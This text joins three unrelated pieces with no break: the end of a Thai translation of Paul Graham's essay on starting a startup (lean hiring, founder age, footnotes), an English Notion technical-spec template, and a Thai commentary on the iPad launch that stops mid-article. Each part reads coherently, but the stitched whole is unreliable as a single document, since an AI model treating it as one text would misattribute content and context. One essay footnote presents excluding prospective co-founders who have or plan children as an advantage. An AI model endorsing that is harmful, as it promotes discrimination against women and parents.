แนวคิดผมอาจจะสุดขั้วไปหน่อย แต่ผมคิดว่าการจ้างพนักงานเป็นสิ่งที่แย่ที่สุดที่บริษัทสามารถทำได้ เพราะพนักงานถือเป็นค่าใช้จ่ายต่อเนื่องของบริษัท ค่าใช้จ่ายแบบนี้เป็นค่าใช้จ่ายประเภทที่แย่ที่สุด การมีพนักงานเพิ่มยังแปลว่าสำนักงานของคุณจะเริ่มคับแคบจนต้องขยับขยายไปยังสถานที่ที่ใหญ่ขึ้น แต่อาจมีบรรยากาศไม่เหมาะแก่การพัฒนาซอฟต์แวร์ สิ่งที่แย่ที่สุดของพนักงานที่เยอะขึ้นคือคุณจะทำงานได้ช้าลง ในตอนที่คนยังน้อยคุณก็อาจนั่งคุยงานกับใครสักคนที่โต๊ะของเขาจนเสร็จเรียบร้อย แต่ถ้ามีคนสัก 8 คนก็คงต้องจัดประชุมเพื่อคุยเรื่องเดียวกัน ดังนั้นมีคนน้อยเท่าไรยิ่งดีเท่านั้น ในช่วงฟองสบู่ดอตคอม บริษัทสตาร์ตอัพจำนวนมากเลือกใช้นโยบายที่ตรงกันข้าม พวกเขาอยากเพิ่มจำนวนพนักงานให้เร็วที่สุดเท่าที่จะทำได้ ราวกับว่าคุณจะไม่มีทางทำงานอะไรสำเร็จเลยถ้าหากไม่มีคนมานั่งประจำในตำแหน่งนั้นๆ นี่เป็นวิธีคิดขององค์กรขนาดใหญ่ที่ควรเลี่ยง จงอย่าจ้างคนเพียงเพราะจะนำมาเสริมตำแหน่งที่ควรมีในแผนผังองค์กร เหตุผลเดียวที่คุณควรจ้างคนเพิ่ม คือจ้างเพื่อมาทำงานที่คุณอยากทำแต่ทำไม่ได้ ถ้าการจ้างคนในตำแหน่งที่ไม่จำเป็นถือเป็นการเปลืองเงินและทำให้การตัดสินใจช้าลง คำถามคือทำไมบริษัทส่วนใหญ่ถึงทำแบบนั้น ผมคิดว่าคำตอบหลักอยู่ที่คนส่วนมากมักรู้สึกดีถ้ามีพนักงานเยอะๆ จุดอ่อนนี้มักเกิดกับพวก CEO ด้วย ถ้าคุณเคยเป็นผู้บริหารของบริษัท คำถามที่คุณจะถูกถามเสมอๆ คือคุณมีพนักงานเท่าไร นั่นเป็นวิธีประเมินคุณค่าของซีอีโอ ทุกคนถามคำถามนี้ไม่เว้นแม้แต่พวกนักข่าว และพวกเขาจะประทับใจมากถ้าหากคุณมีพนักงานหลักพัน ไม่ใช่หลักสิบ นี่เป็นเรื่องแปลก ลองเทียบสองบริษัทที่มีรายได้เท่ากัน บริษัทที่มีคนน้อยกว่าย่อมเจ๋งกว่า เวลามีคนมาถามผมว่าบริษัทของเรามีพนักงานกี่คน ผมจะตอบว่า “ยี่สิบ” พวกเขาจะคิดว่าเราไม่เก่งพอ ผมเคยอยากจะตอบไปว่า “คู่แข่งของเรามีพนักงานร้อยสี่สิบคน แต่ไม่เคยสู้เราได้ คุณคิดว่าใครเก่งกว่ากันแน่?” จำนวนพนักงานก็เป็นเรื่องแบบเดียวกับสำนักงาน มันเป็นการตัดสินว่าคุณเลือกที่จะ “ดูเหมือนว่าเจ๋ง” หรือ “เจ๋งจริงด้วยตัวเอง” กันแน่ ถ้าคุณเคยเป็นเนิร์ดในโรงเรียนมัธยม คุณจะเข้าใจการเลือกวิถีชีวิตแบบนี้ จงทำแบบเดียวกันเมื่อคุณเริ่มตั้งบริษัทของตัวเอง ## ควรตั้งบริษัทหรือเปล่า? ทีนี้มาถึงคำถามว่าคุณควรตั้งบริษัทหรือเปล่า? คุณมีลักษณะนิสัยที่เหมาะแก่การสร้างกิจการหรือไม่? ถ้าใช่ การเปิดบริษัทนั้นคุ้มเหนื่อยหรือเปล่า? คนจำนวนไม่น้อยมีนิสัยที่เหมาะกับการสร้างกิจการมากกว่าที่ตัวเองคิด นี่เป็นเหตุผลสำคัญที่ผมเขียนบทความชิ้นนี้ ผมหวังว่าจะมีสตาร์ตอัพมากกว่าที่เป็นอยู่ในตอนนี้สัก 10 เท่า และนี่ย่อมเป็นเรื่องดีต่อวงการเทคโนโลยี ผมเพิ่งตระหนักว่าตัวเองเป็นคนที่เหมาะแก่การสร้างกิจการเป็นอย่างยิ่ง แต่ตัวผมในอดีตก็หวั่นกลัวการเปิดบริษัทเช่นกัน ผมรู้สึกเช่นนั้นเพราะผมเคยมีอาชีพเป็นโปรแกรมเมอร์ภาษา Lisp บริษัทที่ผมเคยทำงานด้วยในตอนนั้นมีปัญหาทางการเงิน จะย้ายไปอยู่ที่อื่นก็ลำบากเพราะมีบริษัทที่ทำกิจการเกี่ยวกับ Lisp น้อยมาก ตัวผมเองก็ไม่สามารถปรับตัวไปเขียนภาษาอื่นได้ (ตอนนั้นปี 1995 นะครับ ภาษาอื่นที่ผมว่าคือ C++) ทางออกเดียวที่เหลืออยู่คือออกไปเปิดบริษัทเองที่ใช้ภาษา Lisp เขียนโปรแกรม ผมอาจโอเวอร์ไปหน่อยแต่ถ้าคุณเขียนภาษา Lisp เหมือนกัน คุณจะเข้าใจผม และถ้าแนวคิดการเปิดบริษัททำให้ผมหวั่นเกรงเป็นอย่างมาก จนสุดท้ายต้องยอมเปิดบริษัทด้วยเหตุผลว่าสถานการณ์บังคับ ผมก็คิดว่ามีคนอีกมากที่ตกอยู่ในสถานการณ์แบบเดียวกัน เป็นคนที่เหมาะกับการเปิดบริษัทแต่ไม่กล้าเสี่ยงพอ ใครกันแน่ที่เหมาะแก่การเปิดบริษัท? ผมคิดว่าต้องเป็นแฮ็กเกอร์เก่งๆ อายุระหว่าง 23-38 อยากแก้ปัญหาทางการเงินของชีวิตแบบม้วนเดียวจบ แทนการรับเงินเดือนไปเรื่อยๆ ตามอายุงานมาตรฐาน ผมไม่สามารถอธิบายได้แบบเป๊ะๆ นักว่า “แฮ็กเกอร์เก่ง” เป็นอย่างไรกันแน่ อาจเป็นนักศึกษาด้านคอมพิวเตอร์ที่มีเกรดดีในมหาวิทยาลัยชื่อดัง แต่คุณไม่จำเป็นต้องจบด้านคอมพิวเตอร์โดยตรงเพื่อเป็นแฮ็กเกอร์ ผมเองจบสาขาปรัชญาตอนเรียนมหาวิทยาลัย การตัดสินว่าใครเป็นแฮ็กเกอร์ที่เก่งหรือไม่เป็นเรื่องยากมาก โดยเฉพาะอย่างยิ่งเมื่อเขายังหนุ่ม โชคดีที่กระบวนการของการเปิดบริษัทจะคัดเลือกแฮ็กเกอร์เก่งๆ ให้อยู่รอดตามธรรมชาติ การเปิดบริษัทจะบีบให้คนที่คิดจะเปิดบริษัทต้องมองดูเทคโนโลยีในปัจจุบัน และเริ่มคิดใคร่ครวญว่าจะปรับปรุงมันอย่างไร ถ้าเขาทำได้ นี่คือสัญญาณว่าเขาเป็นแฮ็กเกอร์ที่ดี ผมกำหนดกรอบอายุขั้นต่ำไว้ที่ 23 ปี อันนี้ไม่เกี่ยวกับอายุสมอง แต่คุณต้องโตพอที่จะเรียนรู้ว่าโลกธุรกิจในปัจจุบันมีลักษณะอย่างไร ก่อนที่จะเปิดบริษัทเพื่อหาผลิตภัณฑ์มาทำตลาด คำว่า “ธุรกิจ“ ที่ว่าไม่จำเป็นต้องเป็นบริษัทสตาร์ตอัพแห่งใดแห่งหนึ่ง ผมเองทำงานในบริษัทซอฟต์แวร์อยู่ปีหนึ่งเพื่อหาเงินมาจ่ายเงินกู้ค่าเรียนมหาวิทยาลัย มันเป็นช่วงที่แย่ที่สุดในชีวิตการทำงานของผมเลยล่ะ แต่ผมก็เรียนรู้สิ่งต่างๆ มากมาย (อย่างไม่รู้ตัวในตอนนั้น) เกี่ยวกับธุรกิจซอฟต์แวร์ ส่วนมากเป็นบทเรียนด้านลบ เช่น อย่าจัดการประชุมมากเกินไป อย่าให้คนหลายคนร่วมกันดูแลโค้ดส่วนเดียวกัน อย่าให้พวกเซลส์มีอำนาจบริหารบริษัท อย่าพยายามสร้างผลิตภัณฑ์ราคาแพง อย่าปล่อยให้โค้ดมีขนาดใหญ่จนคุมไม่อยู่ อย่าปล่อยให้ฝ่าย QA เป็นคนหาบั๊ก อย่าทิ้งช่วงการออกรุ่นซอฟต์แวร์ให้นานเกินไป อย่าย้ายสำนักงานจาก Cambridge ไปอยู่บนถนน Route 128 [8] ฯลฯ บทเรียนด้านลบเหล่านี้มีค่าพอๆ กับบทเรียนด้านบวก หรือบางครั้งอาจมากกว่าด้วยซ้ำ การทำงานให้ออกมาดีเลิศเป็นเรื่องยากมาก แต่การหลีกเลี่ยงปัญหาเป็นเรื่องที่ตรงไปตรงมาและทุกคนสามารถทำได้ [9] อีกเหตุผลหนึ่งที่คุณไม่ควรเปิดบริษัทก่อนอายุ 23 คือทุกคนจะคิดว่าคุณเด็กเกินไป และไม่ให้ความสำคัญกับคุณเท่าที่ควร พวก VC จะไม่เชื่อถือคุณ และพยายามตั้งเงื่อนไขการให้เงินที่ลดบทบาทของคุณเหลือแค่สัญลักษณ์ของบริษัทเท่านั้น ลูกค้าจะกลัวว่าคุณไม่รับผิดชอบและทิ้งงาน หรือแม้แต่ตัวคุณเองก็คงรู้สึกแปลกๆ ที่จะเป็นเจ้านายของคนที่มีอายุมากกว่าคุณ (ยกเว้นคุณเป็นคนแปลกแบบสุดขั้ว) และการเลี่ยงไปจ้างพนักงานที่อายุน้อยกว่าคุณ ถ้าหากคุณอายุแค่ 21 ปี ตัวเลือกก็มีจำกัดมาก ถ้าอยากทำจริงๆ บางคนอาจตั้งบริษัทตั้งแต่อายุ 18 ก็ได้ ตอนที่บิล เกตส์ตั้งไมโครซอฟท์ เขาอายุแค่ 19 ปี (ส่วนพอล อัลเลน คู่หูของเขาอายุ 22 ปี) ถ้าคุณคิดจะเปิดบริษัทจริงๆ ก็ไม่ต้องแคร์เสียงคนอื่นมากนัก คุณอาจเป็นคนแบบเดียวกับบิล เกตส์ก็ได้ การที่เพดานอายุสูงสุดคือ 38 ปีมีเหตุผลประกอบหลายอย่าง เหตุผลแรกคือผมคิดว่าคนที่อายุมากกว่านี้จะมีความอึดน้อยลงกว่าคนหนุ่มๆ มาก ผมเคยทำงานถึงตีสองตีสามทุกวัน ไม่มีวันหยุด และผมคิดว่าตัวเองในตอนนี้ทำแบบนั้นไม่ได้อีกแล้ว เหตุผลข้อถัดมาคือสตาร์ตอัพมีความเสี่ยงทางการเงินสูง ถ้าคุณลองเปิดบริษัทแล้วเจ๊งหมดตัวตอนคุณอายุ 26 คุณย่อมมีปัญหาการเงิน แต่คนหนุ่มอายุ 26 จำนวนไม่น้อยก็จนแบบนี้แหละ ไม่แปลกอะไรมากนัก แต่พอคุณอายุ 38 คุณจะเสี่ยงแบบเดียวกันไม่ได้แล้ว และถ้าคุณมีลูกก็ยิ่งยากเข้าไปอีก คำเตือนสุดท้ายของผมคือ คุณต้องถามตัวเองว่าอยากจะเปิดบริษัทอย่างจริงจังหรือไม่ การเปิดบริษัทคือการบีบช่วงเวลาการทำงานในชีวิตของคุณแบบอัดแน่น คนปกติทำงานกันนาน 40 ปีจนเกษียณอายุ แต่ถ้าเป็นสตาร์ตอัพ คุณต้องทำงานแบบหฤโหดเป็นเวลา 4 ปี แถมในตอนท้ายมันอาจเป็น 4 ปีที่สูญเปล่าด้วย (และผมยกตัวอย่างแค่ 4 ปี ในความเป็นจริงตัวเลขอาจเยอะกว่านั้น) ช่วงเวลานี้คุณแทบไม่ได้ทำอย่างอื่นเลยยกเว้นทำงาน เพราะถ้าคุณหยุดทำงานเมื่อไร คู่แข่งของคุณจะแซงหน้าคุณไปเมื่อนั้น ตอนนั้นนอกจากผมทำงานแล้วผมไปวิ่งบ้าง และมีเวลาอ่านหนังสือแค่คืนละ 15 นาที ผมมีแฟนคิดเป็นเวลารวม 2 เดือนจากช่วงชีวิต 3 ปี ทุกสองสามสัปดาห์ผมไปผ่อนคลายในร้านหนังสือหรือกินข้าวบ้านเพื่อนสัก 2-3 ชั่วโมง ผมกลับไปเยี่ยมบ้านเกิดสองครั้ง เวลาที่เหลือทั้งหมดอยู่กับงาน การทำงานในสตาร์ตอัพมักเป็นเรื่องสนุก เหตุผลเพราะเพื่อนร่วมงานของผมคือกลุ่มเพื่อนที่ดีที่สุดของผมด้วย บางทีตัวงานอาจมีความน่าสนใจในเชิงเทคนิค แต่อย่างมากก็แค่ 10% ของงานทั้งหมด อย่างไรก็ตาม งาน 90% ที่ดูน่าเบื่อก็ไม่ได้น่าเบื่อขนาดนั้น เรามีเรื่องสนุกๆ มากกว่าที่คิด เช่น ครั้งหนึ่งไฟดับเป็นเวลา 6 ชั่วโมง และเราเคยพยายามเดินเครื่องปั่นไฟที่ใช้น้ำมันภายในออฟฟิศ มันเป็นความคิดที่แย่มากและผมจะไม่ทำอีกแล้ว แต่มันก็เป็นเรื่องสนุกมาก ผมไม่คิดว่าชีวิตการทำงานในสตาร์ตอัพจะมีอะไรแย่มากไปกว่าการทำงานในบริษัทปกติ เผลอๆ อาจน้อยกว่าด้วยซ้ำ ที่ปัญหาดูเยอะเป็นเพราะว่าคุณต้องทำงานเยอะกว่าปกติในช่วงเวลาสั้นๆ สิ่งที่เป็นปัญหามากที่สุดของสตาร์ตอัพคงเป็นว่ามันดูดเวลาในชีวิตคุณไปมากกว่าปัญหาในการทำงาน ถ้าคุณคิดอยากเปิดบริษัทก็ควรคิดถึงเรื่องนี้ให้มาก ถ้าคุณเป็นคนที่พยายามจะหาเงินเลี้ยงชีวิตแบบม้วนเดียวจบ แทนการทำงานกินเงินเดือนไปอีก 40 ปี การเปิดบริษัทก็เหมาะสำหรับคุณ หลายคนอาจต้องเลือกระหว่างการเปิดบริษัทหรือการเรียนต่อปริญญาโท ช่วงชีวิตของนักศึกษาปริญญาโทถือว่าเหมาะมากแก่การเปิดบริษัทซอฟต์แวร์ (และคนที่ไปเรียนโทก็เหมาะแก่การเปิดบริษัทซอฟต์แวร์ด้วย) คุณอาจกังวลว่าถ้าคุณหันมาเปิดบริษัท คุณจะเสียโอกาสทางการศึกษาช่วงนั้นไป การทำสองอย่างพร้อมกันนั้นเป็นไปได้ แฮ็กเกอร์ในบริษัทผม 3 คนแรก มี 2 คนที่เรียนโทไปด้วย และสุดท้ายก็เรียนจบทั้งคู่ ไม่มีช่วงอายุไหนที่คนมีพลังเยอะเท่ากับนักศึกษาปริญญาโทที่ยังเรียนไม่จบอีกแล้ว ถ้าคุณต้องเลิกเรียนโทเพื่อมาเปิดบริษัท ในกรณีที่เลวร้ายที่สุด คุณจะหยุดเรียนไม่นานหรอก เพราะถ้าบริษัทไม่ประสบความสำเร็จ มันจะล้มอย่างรวดเร็วและคุณสามารถกลับมาเป็นนักศึกษาได้อีกครั้ง แต่ถ้ามันประสบความสำเร็จ คุณก็จะรู้สึกว่าการเป็นผู้ช่วยศาสตราจารย์ไม่น่าสนใจอีกต่อไปแล้ว ถ้าคุณอยากเปิดบริษัท จงเปิดบริษัทซะ การเปิดบริษัทไม่ได้เป็นศาสตร์ดำมืดเหมือนอย่างที่คนนอกมองเห็น คุณไม่จำเป็นต้องเรียนรู้โลกธุรกิจจนถ่องแท้ก่อนมาเปิดกิจการ ขอเพียงแค่คุณสร้างผลิตภัณฑ์ที่คนรัก และใช้เงินให้น้อยเข้าไว้ มันไม่ใช่เรื่องยากอะไรเลย ### หมายเหตุ: [1] รายได้ของกูเกิลตกอยู่ราวๆ 2 พันล้านดอลลาร์ต่อปี แต่ครึ่งหนึ่งมาจากโฆษณาที่อยู่บนเว็บไซต์อื่น (ตัวเลขปี 2005 - ผู้แปล) [2] สิ่งที่สตาร์ตอัพเหนือกว่าบริษัทใหญ่คือ ไม่มีกฎหมายห้ามกีดกันพนักงานสำหรับการก่อตั้งบริษัท ตัวอย่างเช่น ผมอาจไม่อยากเปิดบริษัทร่วมกับเพื่อนผู้หญิงที่มีลูกหรือกำลังจะมีลูก แต่ถ้าเป็นบริษัทใหญ่คุณไม่มีสิทธิถามว่าที่พนักงานตอนสัมภาษณ์ว่าคิดจะมีลูกในเร็วๆ นี้หรือไม่ ภายใต้กฎหมายสหรัฐ คุณไม่สามารถกีดกันลูกจ้างด้วยเงื่อนไขพื้นฐานบางอย่าง แต่ในกรณีของสตาร์ตอัพ คุณสามารถเลือกเพื่อนมาร่วมเปิดบริษัทได้ตามต้องการ [3] การเรียนเขียนโปรแกรมถูกกว่าการเรียนบริหารธุรกิจมาก เพราะคุณสามารถทำได้ด้วยตัวเองเกือบทั้งหมด ค่าใช้จ่ายมีแค่ซื้อคอมพิวเตอร์สักเครื่อง ลงลินุกซ์ ซื้อตำราภาษา C ของ Kernighan & Ritchie และขอให้เด็กข้างบ้านอายุ 15 ช่วยสอนให้สักสองสามชั่วโมง คุณก็เริ่มต้นได้แล้ว [4] บทเรียนข้อต่อมา: อย่าตั้งบริษัทที่ขายของให้บริษัทขนาดใหญ่หรือรัฐบาล แน่นอนว่ามันมีโอกาสทำเงินจากตลาดนี้ แต่เรื่องนี้ปล่อยให้คนอื่นลองทำจะดีกว่า [5] มีเพื่อนผมคนหนึ่งตั้งบริษัทในเยอรมนี เขาเล่าให้ผมฟังว่ารัฐบาลเยอรมนีค่อนข้างเข้มงวดกับงานเอกสาร นี่อาจเป็นเหตุผลอธิบายได้ว่าทำไมมีสตาร์ตอัพในเยอรมนีไม่เยอะนัก [6] ตอนที่เราขอเงินระดมทุนรอบแรก บริษัทของเรามีมูลค่า 100,000 ดอลลาร์ เพราะ Julain ถือหุ้น 10% แต่มันเป็นตัวเลขที่ชวนให้เข้าใจผิดได้ง่าย เพราะ Julian ไม่ได้ให้แค่เงิน แต่ให้อย่างอื่นที่ล้ำค่ากว่าแก่เราด้วย [7] คำแนะนำนี้ใช้กับบริษัทที่อยากมาซื้อกิจการของคุณได้ด้วย มีบริษัทบางแห่งที่พยายามจะเข้ามาซื้อกิจการของเรา แต่เอาจริงๆ แล้วตั้งใจมาฉกไอเดียหรือความคิดของคุณไปมากกว่า เราแยกแยะบริษัทแบบนี้ได้ยาก ดังนั้นวิธีที่เหมาะที่สุดคือพยายามทำให้ดูเหมือนว่าเราเปิดเผยข้อมูลทั้งหมด แต่จริงๆ แล้วยังซ่อนข้อมูลลับทางเทคนิคที่สำคัญเอาไว้ [8] ผมถือเป็นพนักงานที่แย่ของบริษัทนี้ ขอโทษทุกคนที่ชวนผมไปทำงานที่นั่นด้วย [9] คุณอาจเขียนหนังสือเกี่ยวกับการทำธุรกิจให้ประสบความสำเร็จ โดยการทำทุกอย่างให้ตรงข้ามกับกรมการขนส่งทางบกของอเมริกา ขอบคุณ Trevor Blackwell, Sarah Harlin, Jessica Livingston,Robert Morris ที่ช่วยอ่านและตรวจทานบทความนี้ในฉบับร่าง และขอบคุณ Steve Melendez กับ Gregory Price ที่เชิญผมไปพูดเรื่องนี้
# New Technical Spec Tags: Engineering # Problem statement What problem are you trying to solve? If there is a PRD, this can be a sync’ed block from the PRD. Link to any other documents that are relevant for background or context. ## Goals What should be true after this project is implemented? ## Non-goals What is explicitly not in scope and why? # Proposed solution What changes are required to solve this problem and achieve the project goals? **What are the high level architectural changes?** Diagrams can be very helpful here. **What are the high level data model changes?** These should include any database schema changes, or any changes to structured fields, e.g. an existing JSON column. **What are the main changes to the UI?** ## Risks What risks might be introduced by this set of changes? Consider running a [pre-mortem](https://www.notion.so/templates/pre-mortem-template) to raise risks. Be sure to capture mitigating these risks in the Implementation and Rollout Plans. **Are there any backwards-incompatible changes?** **Does this project have special implications for security and data privacy?** **Could this change significantly increase load on any of our backend systems?** **Does this project have any dependencies?** # Alternative solutions What alternatives did you consider? Describe the evaluation criteria for how you chose the proposed solution. # Implementation and rollout plan Fill this section out based on what is relevant for the size and scope of this project. This section can also be TBD as the project is started, but you should gradually fill this in as the project progresses towards launch. **Does this project require a migration?** If an extensive migration is necessary, write a separate tech spec for it, and link it here. Describe how to rollback in the event of an unsuccessful migration. **Is this project in an experiment or feature flagged?** Describe how to support an incremental release if needed. ## Success Criteria **How will you validate the solution is working correctly?** Describe what automated and/or manual testing you will do. Does this project need load or stress testing? This can also be a separate Testing Plan doc that is shared with QA, and linked here. **What monitoring and alerting will you do to ensure this project doesn’t decrease performance and reliability?** E.g. Increased requests, latency, and error rates.
# iPad จะอยู่หรือไป เวลาเท่านั้นที่ตอบได้ ในวินาทีนี้คงไม่มีกระแสอะไรจะแรงกว่าเรื่องของ iPad หรือ tablet ตัวใหม่ของแอปเปิลที่ใครๆ ก็ลือกันมานานแสนนาน กระแสวิพากษ์วิจารณ์ต่างๆ ทั้งแง่บวกและลบต่างหลั่งไหลกันมา ตกลงแล้ว iPad นี่คืออะไร และจะสร้างการเปลี่ยนแปลงอะไรให้กับโลกใบนี้? อย่างที่หลายๆ ที่บอกกัน ไม่มีคำอธิบายอะไรที่ดีกว่าการบอกว่า iPad คือ iPhone / iPod touch ขนาดยักษ์ ด้วยรูปลักษณ์พื้นฐานที่แทบจะถอดแบบกันมา ทั้งกรอบดำ จอขนาดใหญ่ที่กินพื้นที่ทั้งหมด ปุ่ม Home ที่อยู่ด้านล่าง พร้อมปุ่มและพอร์ทต่างๆ ที่แทบจะไม่แตกต่างกัน สิ่งเดียวที่แตกต่าง คือขนาดหน้าจอที่ใหญ่กว่าเดิมมาก ทั้งหมดทั้งมวลแล้ว iPad มีความหนาสูงสุดอยู่ที่ครึ่งนิ้ว และมีน้ำหนักประมาณ 0.68 กิโลกรัม หรือครึ่งหนึ่งของ MacBook Air พอดี ในงานเปิดตัว แอปเปิลได้แสดงจุดยืนที่ชัดเกี่ยวกับการพัฒนา iPad นี้ว่าเป็นอุปกรณ์กลุ่มใหม่ที่จะมาคั่นกลางระหว่าง iPhone / iPod touch กับ Mac / PC โดยการที่จะเป็นอุปกรณ์กลุ่มใหม่ได้นั้น จะต้องมีอะไรที่เหนือกว่าของที่มีอยู่เดิม โดยได้มีการกล่าวถึงเน็ตบุ๊กว่าเป็นอุปกรณ์ที่ช้า และทำอะไรไม่ได้ ซึ่งอาจจะเป็นคำเหน็บแนมสไตล์แอปเปิล (ที่สามารถตอกกลับได้ง่ายๆ ว่า “ทำให้ราคาถูกเท่านี้ได้หรือเปล่า?”) การออกแบบ iPad ที่สำคัญคือการนำเอาเทคโนโลยี Multi-touch ที่แอปเปิลมีอยู่ใน iPhone / iPod touch มาสร้างประสบการณ์ใหม่ที่ให้มีขีดความสามารถเทียบเท่ากับคอมพิวเตอร์อื่นๆ ทั่วไป แอปเปิลเลือกที่จะใช้ iPhone OS แทนที่จะเป็น Mac OS เพราะการสัมผัสยังเป็นการติดต่อกับผู้ใช้ที่สำคัญ และคงง่ายกว่าที่จะพัฒนาแอพพลิเคชันที่ทำงานได้ทั้งบน iPhone และ iPad หากเทียบกับ iPad และ Mac OS X โดยในงานนี้แอปเปิลยังรักษาจุดยืนที่เคยประกาศไว้เมื่อ 3 ปีก่อนว่า “ใครกันต้องการ stylus?” แม้ว่า iPad จะสามารถใช้งานแอพพลิเคชันบน iPhone เดิมทั้งหมดได้ แต่แน่นอนว่าในสภาพการใช้งานจริงโปรแกรมที่ออกแบบไว้สำหรับจอเล็กๆ มาถูกแสดงผลบนจอใหญ่ๆ ก็คงจะรู้สึกแปลกหูแปลกตาและเสียดายพื้นที่ (เว้นแต่พวกเกมที่อาจจะไม่มีปัญหามาก) แต่สิ่งนี้คือการสร้างความมั่นใจให้กับเหล่านักพัฒนาว่าองค์ความรู้เดิมทั้งหมดที่พวกเขามีกับ iPhone OS จะสามารถต่อยอดบน iPad ได้ทันที ในขณะที่สร้างความมั่นใจให้กับผู้ใช้ไปในตัวว่า แอพพลิเคชันทั้งหมดที่พวกเขาเคยชื่นชอบบน iPhone OS มีโอกาสจะมาลง iPad อย่างสมบูรณ์แน่นอนเช่นกัน โดยไม่จำเป็นต้องจ่ายเงินเพิ่มเสียด้วยซ้ำ (หากผู้พัฒนาตัดสินใจที่จะอัปเดทให้ฟรี) คงไม่มีใครกังขาว่า iPad จะสามารถทำหน้าที่พื้นฐานที่ iPod ทำได้อย่างดูหนัง ฟังเพลง อีเมล หรือเล่นอินเทอร์เน็ตได้อย่างไม่มีปัญหา (เว้นเสียแต่ว่ายังคงไม่มี Flash เหมือนเดิม) แถมในบางมุมยังจะดีกว่าด้วยซ้ำเนื่องจากพื้นที่หน้าจอที่ใหญ่กว่า การพิมพ์อีเมลด้วยคีย์บอร์ดบนจอใหญ่ๆ หรือท่องเว็บที่ไม่ต้องเพ่งซูมไปซูมมาก็คงง่ายขึ้น จึงเหลือคำถามหนึ่งที่สำคัญว่า แล้ว iPad จะสามารถใช้งานแอพพลิเคชันในระดับคอมพิวเตอร์ส่วนบุคคลทั่วไปหรือไม่? แอปเปิลได้ลองนำเสนอ iWork (ชุดแอพพลิเคชันสำนักงานของแอปเปิล) เวอร์ชันสำหรับ iPad โดยได้มีการปรับเปลี่ยนและพัฒนาส่วนติดต่อกับผู้ใช้ใหม่เกือบทั้งหมด การพยายามรักษาพื้นที่หน้าจอโดยหลีกเลี่ยงให้เหลือแต่สิ่งที่จำเป็น ในขณะที่ตัวเลือกต่างๆ พยายามย้ายหรือซ่อนให้ไปอยู่ในเมนูหรือองค์ประกอบต่างๆ แทน หลายๆ สำนักที่ได้ทดสอบกันพบว่าหากใครที่ใช้ iPhone OS เป็นอยู่แล้ว จะสามารถจับจุดและใช้งานมันได้ทันที สำหรับผู้ใช้ใหม่อาจจะต้องใช้เวลานานกว่าหากเทียบกับ iPhone หรือ iPod touch พอสมควร ปัญหานี้จึงเป็นความท้าทายใหม่ของเหล่าพัฒนาที่จะพยายามใช้การติดต่อแบบสัมผัสนี้กับแอพพลิเคชันต่างๆ ที่เราอาจคุ้นเคยกับการคลิกด้วยเมาส์ แน่นอนว่าในช่วงเวลาแรกอาจมีความสับสนวุ่นวาย เหมือนกับเกม Wii ในช่วงแรกๆ ที่ยังจับจุดการใช้ Wii Remote กันไม่ค่อยได้ แต่เวลาจะค่อยๆ พิสูจน์ว่าระบบสัมผัสนี้จะสามารถใช้ได้จริงในแอพพลิเคชันเหล่านี้หรือไม่ รวมถึงว่าแม้จะใช้ได้จริง เราจะมีเหตุผลอะไรที่จะเลือกใช้โปรแกรมเหล่านี้บน iPad แทนบนคอมพิวเตอร์ของเราที่คุ้นเคยอยู่แล้ว? สำหรับในการเล่นเกม จุดที่น่าสนใจของ iPad ที่สุดน่าจะเป็นขนาดจอ ใน iPhone / iPod touch เดิมที่มีปัญหาสำคัญคือการควบคุมที่ต้องใช้การสัมผัสหลายๆ ครั้งมักจะทำให้นิ้วของผู้เล่นไปบังหน้าจอโดยไม่จำเป็น แต่ด้วยขนาดจอที่ใหญ่ขึ้นมากของ iPad จุดนี้อาจจะไม่ใช่ปัญหาอีกต่อไป คงจะเหลือเพียงความรู้สึกของการได้ขยี้ปุ่มเท่านั้นที่ยังไม่มีทางทดแทนได้จากอุปกรณ์เล่นเกมเจ้าอื่นๆ แอปเปิลได้อ้างว่า iPad มีแบตเตอรี่ที่สามารถใช้งานทั่วไปได้ยาวนานถึง 10 ชั่วโมง ซึ่งคงเป็นเรื่องปกติที่ตัวเลขนี้จะมากกว่าสภาพการใช้งานจริงที่เราจะได้ใช้มัน แต่คำถามที่น่าสนใจคือ เราคาดหวังให้ตัวเลขนี้สูงแค่ไหน? หากเปรียบเทียบกับอุปกรณ์พกพาอย่างโทรศัพท์ตัวเลขนี้จะถือว่าน้อย ในขณะที่หากเราเทียบกับสารพัดโน๊ตบุ๊กและเน็ตบุ๊ก ตัวเลขนี้กลับกลายเป็นตัวเลขที่น่าตื่นตาตื่นใจขึ้นมาทันที และเพราะสิ่งนี้คืออุปกรณ์จำพวกใหม่ จึงยากที่เราจะมีตัวชี้วัดที่จะมาเปรียบเทียบว่าสภาพการใช้งานจริงๆ แล้วเราต้องการแบตเตอรี่นานแค่ไหน อย่างไรก็ตามหากดูจากภาพที่แอปเปิลนำเสนอมาในวีดีโอต่างๆ ดูเหมือนอุปกรณ์นี้จะมุ่งเน้นให้มีการใช้งานในสภาพที่เราอยู่กับที่มากกว่า เช่นนั่งอยู่กับบ้าน หรือที่ออฟฟิศ ซึ่งทำให้การหาที่เสียบสายชาร์จไปด้วยใช้ไปด้วยไม่ใช้เรื่องยากเท่าไหร่ รวมกับว่า iPad มีขนาดที่ใหญ่พอสมควร การจะพกพาติดตัวไปทุกวันอย่าง iPhone คงไม่ใช่สิ่งที่สามารถทำได้ ยังมีอีกสัญญาณหนึ่งที่แอปเปิลแสดงถึงการที่ iPad ไม่ใช่อุปกรณ์ที่เน้นให้ใช้คนเดียวอย่าง iPhone / iPod touch นั่นคือการเลือกใช้จอ LED LCD แบบ IPS ที่มีจุดเด่นที่สำคัญคือมุมมองที่กว้างกว่าจอแบบอื่นๆ มาก และย่อมทำให้ประสบการณ์การใช้ iPad กับคนอื่นที่นั่งหรือยืนอยู่ข้างๆ เราง่ายขึ้น แต่แน่นอนว่ามีข้อเสียที่สำคัญ นั้นคือการใช้พลังงานที่สูงกว่าตัวเลือกอื่นๆ อย่าง AMOLED ที่ Zune HD หรือ Nexus One ใช้ แอปเปิลยังเปิดตัว iBooks โดยนำเสนอ iPad นี้ไปเปรียบเทียบกับ Kindle ของ Amazon แน่นอนว่าในตอนนี้ iBooks ยังเสียเปรียบอยู่มากทั้งในเรื่องของจำนวนหนังสือที่ให้เลือก จนถึงตัว iPad เองที่ไม่ได้ออกแบบมาไว้สำหรับให้อ่านอย่างเดียวอย่าง Kindle ที่เบาหวิว แต่ iPad เองก็มีฟีเจอร์อื่นๆ มากมายที่อาจทำให้ผู้ใช้รู้สึกอยากที่จะจ่ายเงินก้อนเดียวเพื่อทุกอย่างไปเลยได้เช่นเดียวกัน และจอสีก็เป็นอีกจุดขายสำคัญ 